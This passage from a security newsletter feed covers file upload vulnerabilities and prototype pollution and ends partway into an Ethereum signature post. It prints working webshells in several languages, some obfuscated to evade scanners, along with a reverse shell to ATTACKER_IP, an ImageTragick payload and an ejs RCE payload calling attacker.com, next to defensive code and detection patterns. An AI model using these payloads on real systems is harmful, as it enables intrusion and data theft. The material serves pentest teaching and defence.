&lt;?php system($_GET[&apos;cmd&apos;]); ?&gt;
```

Upload this as `shell.php`, access `https://target.com/uploads/shell.php?cmd=whoami`, and you&apos;ve got command execution.

**One-liners for different languages**:

**PHP**:
```php
&lt;?php system($_GET[&apos;c&apos;]); ?&gt;
```

**JSP**:
```jsp
&lt;%@ page import=&quot;java.io.*&quot; %&gt;
&lt;%
Process p = Runtime.getRuntime().exec(request.getParameter(&quot;c&quot;));
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line; while((line = br.readLine()) != null) { out.println(line); }
%&gt;
```

**ASPX (C#)**:
```aspx
&lt;%@ Page Language=&quot;C#&quot; %&gt;
&lt;%@ Import Namespace=&quot;System.Diagnostics&quot; %&gt;
&lt;%@ Import Namespace=&quot;System.IO&quot; %&gt;
&lt;%
Process p = new Process();
p.StartInfo.FileName = &quot;cmd.exe&quot;;
p.StartInfo.Arguments = &quot;/c &quot; + Request[&quot;c&quot;];
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.UseShellExecute = false;
p.Start();
Response.Write(p.StandardOutput.ReadToEnd());
%&gt;
```

**Python CGI** (if server executes `.py` files as CGI):
```python
#!/usr/bin/env python3
import cgi, os

print(&quot;Content-Type: text/plain\n&quot;)  # CGI output must begin with a header block
form = cgi.FieldStorage()
os.system(form.getvalue(&apos;c&apos;, &apos;&apos;))
```

### Upgrading to a Reverse Shell

Once you have command execution, upgrade to an interactive reverse shell:

```bash
# On your attacker machine
nc -lvnp 4444

# Via the webshell (URL-encode the payload)
curl -G &quot;https://target.com/uploads/shell.php&quot; --data-urlencode &quot;cmd=bash -c &apos;bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1&apos;&quot;
```

Or use a more reliable reverse shell like [PentestMonkey&apos;s PHP reverse shell](https://github.com/pentestmonkey/php-reverse-shell).

### Obfuscating Webshells

If the app scans for keywords like `system`, `exec`, `eval`, obfuscate:

```php
&lt;?php
$a = &apos;sys&apos;.&apos;tem&apos;;
$a($_GET[&apos;c&apos;]);
?&gt;
```

Or use base64 encoding:

```php
&lt;?php
eval(base64_decode(&apos;c3lzdGVtKCRfR0VUWydjJ10pOw==&apos;));
?&gt;
```

Decode that base64: `system($_GET[&apos;c&apos;]);`

## 📂 Path Traversal in File Uploads

If you can control the uploaded filename, try path traversal to overwrite critical files.

**Example**: Overwrite SSH authorized keys:

```http
POST /upload HTTP/1.1

------WebKitFormBoundary
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;../../root/.ssh/authorized_keys&quot;
Content-Type: text/plain

ssh-rsa AAAAB3... attacker@evil
------WebKitFormBoundary--
```

If the server doesn&apos;t sanitize the filename, this writes your SSH public key to `/root/.ssh/authorized_keys`, giving you root SSH access.

**Other targets**:
- `/etc/passwd` (if writable, rare but possible)
- Application configuration files
- Cron jobs (`/etc/cron.d/`)
- Web server configs (`.htaccess`, `web.config`)

**Zip Slip ([CVE-2018-1002200](https://nvd.nist.gov/vuln/detail/CVE-2018-1002200))**: If the app extracts uploaded ZIP files without sanitizing paths, you can include files with traversal paths:

```
malicious.zip
  └── ../../../etc/cron.d/backdoor
```

When extracted, this writes to `/etc/cron.d/backdoor`, giving you scheduled code execution.
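
Modern versions of Python&apos;s `zipfile` strip `..` components during extraction, but plenty of extraction code in other languages and libraries does not. A defensive check that rejects traversal entries before extracting anything (destination path is illustrative):

```python
import io
import os
import zipfile

def extract_safely(zip_bytes, dest):
    dest = os.path.abspath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Resolve each entry and refuse anything that lands outside dest
            target = os.path.abspath(os.path.join(dest, info.filename))
            if not target.startswith(dest + os.sep):
                raise ValueError('blocked traversal entry: ' + info.filename)
        zf.extractall(dest)

# Build a malicious archive in memory to show the check firing
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr('../../etc/cron.d/backdoor', '* * * * * root /tmp/x\n')

try:
    extract_safely(buf.getvalue(), '/tmp/extract-demo')
except ValueError as err:
    print(err)  # blocked traversal entry: ../../etc/cron.d/backdoor
```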

## 🖼️ Image-Based Exploits

Uploading images seems safe, right? Not always.

### ImageTragick (CVE-2016-3714)

ImageMagick, a widely used image processing library, had a critical RCE vulnerability. If the app uses ImageMagick to process uploads, you can exploit it with a malicious image:

```
push graphic-context
viewbox 0 0 640 480
fill &apos;url(https://attacker.com/shell.php|ls &quot;-la&quot;)&apos;
pop graphic-context
```

Save this as `exploit.mvg`, upload it, and ImageMagick executes the command.

**Status**: Patched in 2016 but legacy systems still vulnerable.

### SVG XSS and XXE

SVG files are XML-based. You can embed JavaScript for XSS:

```xml
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;script&gt;alert(document.domain)&lt;/script&gt;
&lt;/svg&gt;
```

Or XXE payloads (as covered in [Issue 22](https://www.kayssel.com/newsletter/issue-22/)):

```xml
&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;
&lt;!DOCTYPE svg [
  &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;
  &lt;text&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;
```

If the app renders or processes SVGs server-side, you can leak files or achieve XSS.

### EXIF Metadata Injection

Images contain EXIF metadata. Some apps display this metadata to users. Inject XSS payloads:

```bash
exiftool -Comment=&apos;&lt;script&gt;alert(1)&lt;/script&gt;&apos; image.jpg
```

If the app displays the comment field without sanitizing, you&apos;ve got stored XSS.

## 🛡️ Real-World CVEs

**[CVE-2021-24145](https://nvd.nist.gov/vuln/detail/CVE-2021-24145) (WordPress Modern Events Calendar)**: Arbitrary file upload vulnerability in versions before 5.16.5. Attackers could bypass validation by setting `Content-Type: text/csv` while uploading PHP files. Required administrator privileges but led to RCE. CVSS: 7.2 HIGH.

**[CVE-2020-9484](https://nvd.nist.gov/vuln/detail/CVE-2020-9484) (Apache Tomcat)**: Deserialization of untrusted data vulnerability exploitable when PersistenceManager with FileStore is configured. Attackers with control over file names and contents on the server could achieve RCE via crafted session files. Affected Tomcat 7.0.0-7.0.103, 8.5.0-8.5.54, 9.0.0.M1-9.0.34, and 10.0.0.M1-10.0.0.M4. CVSS: 7.0 HIGH.

**[CVE-2019-8943](https://nvd.nist.gov/vuln/detail/CVE-2019-8943) (WordPress Core)**: Path traversal vulnerability in the `wp_crop_image()` function affecting WordPress through version 5.0.3. Authenticated attackers with image cropping privileges could write files to arbitrary directories using filenames with double extensions and `../` sequences (e.g., `image.jpg?/../../shell.php`), leading to RCE. CVSS: 6.5 MEDIUM.

**[CVE-2018-1002200](https://nvd.nist.gov/vuln/detail/CVE-2018-1002200) (Zip Slip)**: Directory traversal vulnerability in plexus-archiver before version 3.6.0. Attackers could craft ZIP archives with `../` sequences in file paths, allowing file writes to arbitrary locations during extraction. Also known as &quot;Zip Slip&quot;, this vulnerability affected numerous Java applications using the library. CVSS: 5.5 MEDIUM.

## 🛠️ Tools of the Trade

**[Burp Suite](https://portswigger.net/burp)**: Essential for intercepting and modifying upload requests. Use Repeater to test different payloads.

**[Upload Scanner (Burp Extension)](https://github.com/modzero/mod0BurpUploadScanner)**: Automates testing for file upload vulnerabilities including extension, MIME type, and content validation bypasses.

**[Fuxploider](https://github.com/almandin/fuxploider)**: Automated file upload vulnerability scanner. Tests various bypass techniques and generates reports.

**[exiftool](https://exiftool.org/)**: Manipulate image metadata for EXIF injection attacks.

**[Mitra](https://github.com/corkami/mitra)**: Generate polyglot files (parasites, polymocks, crypto-polyglots) valid in multiple formats (PNG/JPEG/PDF/etc).

**[ImageTragick PoCs](https://github.com/ImageTragick/PoCs)**: Collection of ImageTragick exploit proof-of-concepts for CVE-2016-3714.

**Webshell Collections**:
- **[SecLists Webshells](https://github.com/danielmiessler/SecLists/tree/master/Web-Shells)**: Large collection of webshells in various languages
- **[PayloadsAllTheThings - File Upload](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files)**: Comprehensive collection of file upload bypass techniques, payloads, and exploitation methods

## 🧪 Labs &amp; Practice

**PortSwigger Web Security Academy**:
- [Web shell upload via extension blacklist bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-extension-blacklist-bypass)
- [Web shell upload via Content-Type restriction bypass](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-content-type-restriction-bypass)
- [Web shell upload via path traversal](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-path-traversal)
- [Web shell upload via obfuscated file extension](https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extension)
- [Remote code execution via polyglot web shell upload](https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-polyglot-web-shell-upload)

Main resource: [https://portswigger.net/web-security/file-upload](https://portswigger.net/web-security/file-upload)

**TryHackMe**:
- **[Upload Vulnerabilities](https://tryhackme.com/room/uploadvulns)**: Comprehensive room covering client-side filters, MIME validation, magic number validation, and more
- **[Overpass 2](https://tryhackme.com/room/overpass2hacked)**: Includes file upload exploitation for persistence

**Hack The Box**:
- **[Magic](https://app.hackthebox.com/machines/Magic)**: Medium-rated Linux box featuring SQL injection to bypass login and file upload bypass using double extensions (.php.jpg) and EXIF metadata injection to upload webshell
- **[Help](https://app.hackthebox.com/machines/Help)**: Medium-rated box exploiting HelpDeskZ file upload vulnerability allowing PHP reverse shell upload and execution

## 🔒 Defense and Detection

If you&apos;re defending against file upload attacks, here&apos;s what actually works:

### 1. Whitelist Allowed Extensions

Never use blacklists. Whitelist only the exact extensions you need:

```python
ALLOWED_EXTENSIONS = {&apos;png&apos;, &apos;jpg&apos;, &apos;jpeg&apos;, &apos;gif&apos;}

def allowed_file(filename):
    return &apos;.&apos; in filename and \
           filename.rsplit(&apos;.&apos;, 1)[1].lower() in ALLOWED_EXTENSIONS
```

### 2. Validate File Content, Not Just Extension

Go beyond the extension: parse the actual content server-side, for example with Pillow (`Image.open` only reads the header, so call `verify()` as well):

```python
from PIL import Image

def validate_image(file):
    try:
        img = Image.open(file)
        img.verify()  # walks the image data and raises if it is not a real image
        return img.format.lower() in [&apos;png&apos;, &apos;jpeg&apos;, &apos;gif&apos;]
    except Exception:
        return False
```

### 3. Rename Uploaded Files

Never trust user-supplied filenames. Generate random names:

```python
import os
import uuid

def save_file(file):
    if &apos;.&apos; not in file.filename:
        raise ValueError(&apos;missing extension&apos;)
    ext = file.filename.rsplit(&apos;.&apos;, 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(&apos;extension not allowed&apos;)
    filename = f&quot;{uuid.uuid4()}.{ext}&quot;
    file.save(os.path.join(UPLOAD_FOLDER, filename))
```

### 4. Store Files Outside the Web Root

Don&apos;t store uploads in directories served directly by the web server. Store them outside the web root and serve via a separate script that sets proper headers:

```python
# Store in /var/app/uploads (not /var/www/html/uploads)
# Serve via /download/&lt;file_id&gt; endpoint with proper Content-Type
```
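
A minimal Flask sketch of that pattern (the `FILES` dict stands in for a database lookup and all paths are illustrative; a query parameter is used here, though a path parameter like `/download/&lt;file_id&gt;` works the same way):

```python
import os
from flask import Flask, abort, request, send_from_directory

app = Flask(__name__)
UPLOAD_DIR = '/var/app/uploads'   # outside the web root
FILES = {'42': 'a1b2c3d4.png'}    # stand-in for a database of stored names

@app.route('/download')
def download():
    stored = FILES.get(request.args.get('file_id', ''))
    if stored is None:
        abort(404)
    # Force a download; nothing in UPLOAD_DIR is ever rendered or executed
    return send_from_directory(UPLOAD_DIR, stored,
                               mimetype='application/octet-stream',
                               as_attachment=True)
```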

### 5. Disable Execution in Upload Directories

In Apache, add to `.htaccess` in upload directory:

```apache
&lt;FilesMatch &quot;.*&quot;&gt;
    SetHandler default-handler
&lt;/FilesMatch&gt;
```

In Nginx:

```nginx
location /uploads {
    location ~ \.php$ {
        return 403;
    }
}
```

### 6. Set Proper Content-Type Headers

When serving files, set `Content-Type` and `Content-Disposition` headers to prevent execution:

```python
return send_file(filepath,
                 mimetype=&apos;application/octet-stream&apos;,
                 as_attachment=True)
```

### 7. Scan Uploaded Files

Use antivirus or malware scanners like **ClamAV** to scan uploads before storing them.

### 8. Limit File Size

Prevent DoS via large files:

```python
app.config[&apos;MAX_CONTENT_LENGTH&apos;] = 16 * 1024 * 1024  # 16MB max
```

### 9. Implement Rate Limiting

Prevent abuse by limiting uploads per user/IP:

```python
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address

limiter = Limiter(get_remote_address, app=app)

@app.route(&apos;/upload&apos;, methods=[&apos;POST&apos;])
@limiter.limit(&quot;5 per minute&quot;)
def upload():
    ...  # handle the upload and return a response
```

### 10. Monitor and Log

Log all upload attempts with filenames, extensions, sizes, and user IDs. Alert on suspicious patterns like:
- Unusual extensions
- Rapid upload attempts
- Large file sizes
- Path traversal characters in filenames
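
Those alerting rules can be prototyped as simple filename heuristics (the patterns below are illustrative, not exhaustive):

```python
import re

SUSPICIOUS = [
    re.compile(r'\.(php\d?|phtml|phar|jsp|aspx?)(\.|$)', re.I),  # executable extensions, incl. doubles
    re.compile(r'\.\.[\\/]'),                                    # path traversal sequences
    re.compile(r'%00|\x00'),                                     # null-byte tricks
    re.compile(r'[. ]$'),                                        # trailing dot/space tricks
]

def is_suspicious(filename):
    return any(p.search(filename) for p in SUSPICIOUS)

print(is_suspicious('shell.php.jpg'))     # True
print(is_suspicious('../../etc/passwd'))  # True
print(is_suspicious('holiday.png'))       # False
```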

## 🎯 Key Takeaways

- **File uploads are a high-value attack vector** leading directly to RCE in many cases
- **Extension filters are easily bypassed** using double extensions, null bytes, case variation, and alternative extensions
- **Never trust client-side validation** including MIME types and Content-Type headers
- **Magic byte checks can be defeated** with polyglot files and prepended signatures
- **Path traversal in filenames** can overwrite critical system files
- **Defense requires layered validation** using extension whitelisting, content validation, file renaming, and storage outside web root
- **Disable execution in upload directories** to prevent webshells from running even if uploaded
- **Image files aren&apos;t always safe** due to ImageTragick, SVG XSS/XXE, and EXIF injection

## 📚 Further Reading

- **[OWASP File Upload Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html)**: Comprehensive defense guide with implementation examples
- **[HackTricks File Upload](https://book.hacktricks.wiki/en/pentesting-web/file-upload/index.html)**: Extensive collection of file upload bypass techniques and payloads
- **[PortSwigger File Upload Vulnerabilities](https://portswigger.net/web-security/file-upload)**: In-depth explanation with real-world examples
- **[OWASP Testing for File Upload](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files)**: Complete testing methodology

---

That&apos;s it for this week! Next issue, we&apos;ll explore **HTTP Request Smuggling**, where we&apos;ll abuse discrepancies between frontend and backend HTTP parsing to bypass security controls, poison caches, and smuggle malicious requests.

If you&apos;re working on a web app with file uploads, take 10 minutes to review your validation logic. Make sure you&apos;re checking file content, not just extensions. Rename files. Store them outside the web root. And for the love of security, never trust user-supplied filenames.

Thanks for reading, and happy hacking 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Prototype Pollution: Hacking JavaScript From the Inside</title><link>https://www.kayssel.com/newsletter/issue-24</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-24</guid><description>How modifying Object.prototype can lead to RCE, XSS, and complete application compromise</description><pubDate>Sun, 16 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Ever wondered how a simple `__proto__` property could compromise an entire Node.js application? Or how attackers turn innocent merge operations into remote code execution?

Prototype Pollution is one of those vulnerabilities that feels like dark magic. It exploits JavaScript&apos;s inheritance mechanism to inject properties into every object in the application. The result? Authentication bypasses, XSS, denial of service, and in the worst cases, full RCE.

Unlike SQL injection or XSS, Prototype Pollution is uniquely JavaScript. It targets the language itself, not just bad input handling. And because JavaScript powers modern APIs, serverless functions, and frontend frameworks, this attack surface is massive.

In this issue, we&apos;ll break down:
- How JavaScript prototypes actually work
- What makes Prototype Pollution possible
- How to detect and exploit it
- Turning pollution into RCE via template engines
- Client-side pollution for XSS
- Real-world CVEs and their impact

If you&apos;re pentesting Node.js apps, REST APIs, or React/Vue/Angular frontends, this is essential knowledge.

Let&apos;s pollute some prototypes 👇

## 🧠 JavaScript Prototypes: The Foundation

Before we exploit prototypes, we need to understand what they are.

### The Prototype Chain

In JavaScript, every object inherits from `Object.prototype`. When you access a property, JavaScript walks up the prototype chain until it finds the property or hits `null`.

```javascript
const user = { name: &quot;Alice&quot; };

console.log(user.name);          // &quot;Alice&quot; (own property)
console.log(user.toString);      // [Function] (inherited from Object.prototype)
console.log(user.nonExistent);   // undefined
```

The chain looks like this:
```
user → Object.prototype → null
```

When you create an object, it automatically links to `Object.prototype` via an internal `[[Prototype]]` property. You can access this via:
- `__proto__` (deprecated but widely supported)
- `Object.getPrototypeOf(obj)`
- `Object.setPrototypeOf(obj, proto)`

### The Danger: Modifying Object.prototype

Here&apos;s where it gets dangerous. If you can inject properties into `Object.prototype`, **every object in the application** inherits them.

```javascript
// Pollute the prototype
Object.prototype.isAdmin = true;

// Now EVERY object has isAdmin
const user = {};
console.log(user.isAdmin);  // true

const config = {};
console.log(config.isAdmin);  // true
```

This is Prototype Pollution. An attacker modifies the base prototype, and suddenly properties appear everywhere.

## 🧨 How Prototype Pollution Happens

Prototype Pollution occurs when applications merge user input into objects without sanitizing property names. The classic vulnerable pattern is recursive merge functions.

### Vulnerable Code: Recursive Merge

```javascript
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === &apos;object&apos; &amp;&amp; source[key] !== null) {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]);  // Recursive merge
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Vulnerable usage
const userInput = JSON.parse(req.body);
const config = {};
merge(config, userInput);
```

**The Attack:**

An attacker sends:
```json
{
  &quot;__proto__&quot;: {
    &quot;isAdmin&quot;: true
  }
}
```

When `merge()` processes `__proto__`, it modifies `Object.prototype.isAdmin`. Now **every object** in the application has `isAdmin: true`.

### Why This Works

The key `__proto__` is special. Setting `obj.__proto__` doesn&apos;t create a property on `obj`; it modifies the object&apos;s prototype. So:

```javascript
const obj = {};
obj.__proto__.polluted = &quot;yes&quot;;

const anotherObj = {};
console.log(anotherObj.polluted);  // &quot;yes&quot;
```

The pollution propagates globally.

### Alternative Pollution Vectors

Besides `__proto__`, attackers can use:
- `constructor.prototype` - modifies the constructor&apos;s prototype
- `prototype` (if manipulating constructor functions directly)

```json
{
  &quot;constructor&quot;: {
    &quot;prototype&quot;: {
      &quot;isAdmin&quot;: true
    }
  }
}
```

Both achieve the same goal: inject properties into `Object.prototype`.

## 🔍 Detecting Prototype Pollution

### Manual Detection

Look for:
- **Recursive merge/clone functions** - especially custom implementations
- **Object assignment without property filtering** - `Object.assign()`, `_.merge()`, `$.extend()`
- **JSON parsing into objects** - if the result is merged into configuration
- **Library usage** - older versions of lodash, jQuery, hoek, etc.

### Testing for Pollution

Send payloads like:
```json
{
  &quot;__proto__&quot;: {
    &quot;testPollution&quot;: &quot;vulnerable&quot;
  }
}
```

Then check if the property appears globally:
```javascript
const test = {};
console.log(test.testPollution);  // &quot;vulnerable&quot; = polluted
```

For automated detection tools, see the **Tools of the Trade** section below.

## 💥 Exploitation: From Pollution to Impact

Finding prototype pollution is step one. Weaponizing it requires finding a **gadget**: code that uses the polluted property in a dangerous way.

### 1. Authentication Bypass

```javascript
function isAdmin(user) {
  if (user.isAdmin) {
    return true;
  }
  return false;
}

const user = {};  // No isAdmin property
console.log(isAdmin(user));  // false

// After pollution
Object.prototype.isAdmin = true;
console.log(isAdmin(user));  // true (BYPASSED)
```

**Real-World Example:** Many applications check for privilege flags like `user.role === &apos;admin&apos;`. If the property doesn&apos;t exist, JavaScript checks the prototype. Pollute the prototype with the right value, and you&apos;re admin.

### 2. Remote Code Execution via Template Engines

This is where Prototype Pollution gets truly dangerous. Template engines like **ejs**, **handlebars**, **pug**, and **mustache** often use object properties to configure behavior. Pollute the right property, and you can inject code.

**Example: RCE via ejs (CVE-2022-29078)**

The `ejs` template engine uses `opts.outputFunctionName` to define the function name in compiled templates. If polluted, you can inject arbitrary code.

```javascript
// Pollution payload
{
  &quot;__proto__&quot;: {
    &quot;outputFunctionName&quot;: &quot;x;process.mainModule.require(&apos;child_process&apos;).execSync(&apos;curl attacker.com?data=$(whoami)&apos;);var __output&quot;
  }
}

// When ejs compiles a template, it executes the polluted code
```

**Lodash Template Gadget:**

Lodash&apos;s `_.template()` function is another common RCE vector:

```javascript
// Pollute with malicious sourceURL
{
  &quot;__proto__&quot;: {
    &quot;sourceURL&quot;: &quot;\\n;console.log(process.mainModule.require(&apos;child_process&apos;).execSync(&apos;id&apos;).toString());//&quot;
  }
}
```

### 3. Denial of Service (DoS)

Pollute properties that cause infinite loops or crashes:

```json
{
  &quot;__proto__&quot;: {
    &quot;toString&quot;: &quot;not a function&quot;
  }
}
```

Or pollute with `null` to break property accesses:

```json
{
  &quot;__proto__&quot;: {
    &quot;query&quot;: null
  }
}
```

### 4. Client-Side XSS

In browsers, prototype pollution can lead to XSS if the polluted property is rendered in the DOM.

```javascript
// Vulnerable code
document.getElementById(&apos;output&apos;).innerHTML = obj.userContent || &apos;No content&apos;;

// Pollution payload
{
  &quot;__proto__&quot;: {
    &quot;userContent&quot;: &quot;&lt;img src=x onerror=alert(document.domain)&gt;&quot;
  }
}
```

**DOM Clobbering + Prototype Pollution:**

Combine with [DOM clobbering](https://portswigger.net/web-security/dom-based/dom-clobbering) for more impact:
```html
&lt;form id=&quot;__proto__&quot;&gt;&lt;input name=&quot;isAdmin&quot; value=&quot;true&quot;&gt;&lt;/form&gt;
```

## 🛡️ Real-World CVEs

Major libraries affected by Prototype Pollution:

**Lodash ([CVE-2019-10744](https://nvd.nist.gov/vuln/detail/CVE-2019-10744)):** Versions before 4.17.12 vulnerable in `_.defaultsDeep()`. Critical severity allowing object prototype manipulation.

**Lodash ([CVE-2020-8203](https://nvd.nist.gov/vuln/detail/CVE-2020-8203)):** Versions before 4.17.20 vulnerable in `_.zipObjectDeep()`. CVSS 7.4 HIGH severity.

**ejs ([CVE-2022-29078](https://nvd.nist.gov/vuln/detail/CVE-2022-29078)):** Template engine RCE via `outputFunctionName` pollution. CVSS 9.8 CRITICAL allowing full server compromise.

**jQuery ([CVE-2019-11358](https://nvd.nist.gov/vuln/detail/CVE-2019-11358)):** Versions before 3.4.0 vulnerable in `$.extend(true, ...)`. Can lead to XSS in web applications.

**minimist ([CVE-2020-7598](https://nvd.nist.gov/vuln/detail/CVE-2020-7598)):** Command line argument parser before 1.2.2 allows prototype pollution via constructor payloads.

## 🛠️ Tools of the Trade

**Detection &amp; Exploitation:**
- **[ppmap](https://github.com/kleiton0x00/ppmap)** - Detects and exploits client-side prototype pollution in web applications with automatic gadget fingerprinting and XSS payload generation
- **[DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)** (Burp Suite Pro) - Detects client-side prototype pollution automatically
- **[server-side-prototype-pollution](https://github.com/PortSwigger/server-side-prototype-pollution)** (Burp Extension) - Automates server-side pollution testing
- **[ppfuzz](https://github.com/dwisiswant0/ppfuzz)** - Fast Rust-based fuzzer for client-side prototype pollution that fingerprints script gadgets and generates exploitation payloads

**Static Analysis:**
- **[NodeJsScan](https://github.com/ajinabraham/nodejsscan)** - Static analyzer that detects pollution patterns in Node.js code
- **npm audit** - Detects known vulnerable dependencies
- **[Semgrep](https://semgrep.dev)** - Custom rules for detecting vulnerable merge functions
- **[CodeQL](https://codeql.github.com)** - Queries for prototype pollution patterns
- **[eslint-plugin-security](https://github.com/eslint-community/eslint-plugin-security)** - ESLint plugin that detects some security patterns including prototype pollution

## 🧪 Labs &amp; Practice

**[PortSwigger Web Security Academy](https://portswigger.net/web-security/prototype-pollution)**:
- [Client-side prototype pollution via browser APIs](https://portswigger.net/web-security/prototype-pollution/browser-apis/lab-prototype-pollution-client-side-prototype-pollution-via-browser-apis)
- [DOM XSS via client-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/client-side/lab-prototype-pollution-dom-xss-via-client-side-prototype-pollution)
- [Bypassing flawed input filters for server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-bypassing-flawed-input-filters-for-server-side-prototype-pollution)
- [Remote code execution via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-remote-code-execution-via-server-side-prototype-pollution)
- [Privilege escalation via server-side prototype pollution](https://portswigger.net/web-security/prototype-pollution/server-side/lab-privilege-escalation-via-server-side-prototype-pollution)

**[HackTheBox](https://hackthebox.com)**:
- **[Pollution](https://www.hackthebox.com/machines/pollution)**: Hard Linux machine using `constructor.prototype` pollution to achieve privilege escalation and RCE
- **[Gunship](https://app.hackthebox.com/challenges/gunship)**: Web challenge exploiting AST injection in Pug template engine via prototype pollution (easy)
- **[Breaking Grad](https://app.hackthebox.com/challenges/breaking-grad)**: Challenge demonstrating `constructor.prototype` bypass when `__proto__` is filtered (medium)

## 🔒 Mitigation &amp; Defense

**For Developers:**

1. **Freeze prototypes** (breaks pollution entirely):
```javascript
Object.freeze(Object.prototype);
Object.freeze(Object);
```

2. **Use safe alternatives:**
```javascript
// Instead of recursive merge
const config = Object.assign({}, defaults, userInput);

// Or with spread operator
const config = { ...defaults, ...userInput };
```

3. **Filter dangerous keys:**
```javascript
function safeMerge(target, source) {
  const dangerousKeys = [&apos;__proto__&apos;, &apos;constructor&apos;, &apos;prototype&apos;];

  for (let key in source) {
    if (dangerousKeys.includes(key)) continue;

    if (typeof source[key] === &apos;object&apos; &amp;&amp; source[key] !== null) {
      target[key] = safeMerge({}, source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}
```

4. **Use Map instead of objects:**
```javascript
const config = new Map();
config.set(&apos;key&apos;, &apos;value&apos;);
// No prototype chain to pollute
```

5. **Create objects without prototypes:**
```javascript
const obj = Object.create(null);
// obj.__proto__ is undefined
```

**For Pentesters:**

- Always test recursive merge functions
- Check for gadgets in template engines
- Fuzz with various pollution vectors
- Look for chained vulnerabilities (pollution → gadget → RCE)
- Test both `__proto__` and `constructor.prototype`

## 🎯 Key Takeaways

- **Prototype Pollution exploits JavaScript&apos;s inheritance** by polluting `Object.prototype` to inject properties globally
- **Common in merge/clone functions**, especially recursive implementations
- **Requires a gadget for impact**. Find code that uses the polluted property dangerously
- **RCE is possible** via template engines and eval-like constructs, which are prime gadget targets
- **Client-side pollution is exploitable**, where DOM manipulation gadgets can lead to XSS
- **Mitigation is straightforward** using frozen prototypes, key filtering, or Maps
- **Major libraries were vulnerable**. Always update dependencies

## 📚 Further Reading

- **[PortSwigger Prototype Pollution Research](https://portswigger.net/web-security/prototype-pollution)** - Comprehensive guide covering both client-side and server-side exploitation
- **[Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)** - Includes dedicated section on Prototype Pollution (CWE-1321)
- **[Lodash Security Advisories](https://github.com/lodash/lodash/security/advisories)** - Official security advisories for Lodash vulnerabilities
- **[NVD CVE Database](https://nvd.nist.gov/)** - National Vulnerability Database for tracking vulnerability details

---

That&apos;s it for this week! Next issue, we&apos;ll dive into **File Upload Vulnerabilities**, covering everything from bypassing filters to achieving RCE via webshells.

If you found this useful, share it with your team. And if you spot prototype pollution in the wild, let me know. I love hearing about real world finds.

Stay curious, stay secure 🔐

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Transaction Signatures vs Message Signatures: Understanding the Difference</title><link>https://www.kayssel.com/post/web3-20</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-20</guid><description>Deep dive into RLP encoding, EIP-191 versioning, and the security differences between on-chain transaction signatures and off-chain message signatures in Ethereum.</description><pubDate>Wed, 12 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## Introduction

Two signature prompts appear in your wallet. One reads &quot;Send 1 ETH to 0x742d...&quot;. The other says &quot;Login to authenticate session.&quot; Both display cryptographic hex strings. Both require your approval.

Question: which one can drain your wallet?

The answer? Either one. Both can be weaponized. But they operate through fundamentally different mechanisms, and that difference is what separates secure dApps from drained wallets.

In the [previous post](/post/web3-19), we covered the cryptographic foundations. ECDSA, secp256k1, the anatomy of r, s, v components. Now we&apos;re cutting deeper into how Ethereum actually processes these signatures. Because transaction signatures and message signatures aren&apos;t just &quot;two types of the same thing.&quot; They&apos;re architecturally distinct, with different encoding schemes, verification flows, and attack surfaces.

Most developers think the ETH prefix we covered earlier solves the cross-contamination problem. It doesn&apos;t. Not completely. Understanding *why* requires dissecting how each signature type gets constructed, transmitted, and verified.

This post will show you:
- RLP encoding: how Ethereum serializes transactions into signable byte arrays
- The complete EIP-191 specification with all three version bytes
- Why smart contracts verify message signatures manually (and what goes wrong)
- The attack patterns that exploit confusion between signature types
- When each signature type is appropriate (and when it&apos;s suicide)

If you&apos;re building anything that touches signatures, wallet integrations, authentication systems, permit functions, meta-transactions, you need this. Because attackers already know these patterns. They&apos;re exploiting them right now.

Let&apos;s start with how Ethereum packages transaction data.

## Transaction Signatures: RLP Encoding Under the Hood

### What Ethereum Actually Signs

When you approve a transaction, you&apos;re not signing &quot;send 1 ETH to Alice.&quot; You&apos;re signing a precisely structured data package with seven mandatory fields that Ethereum nodes need to execute your transaction:

```
nonce       → Transaction counter preventing replays
gasPrice    → Wei per gas unit you&apos;ll pay
gasLimit    → Maximum gas consumption ceiling
to          → Recipient address (20 bytes)
value       → Wei to transfer
data        → Contract calldata or empty bytes
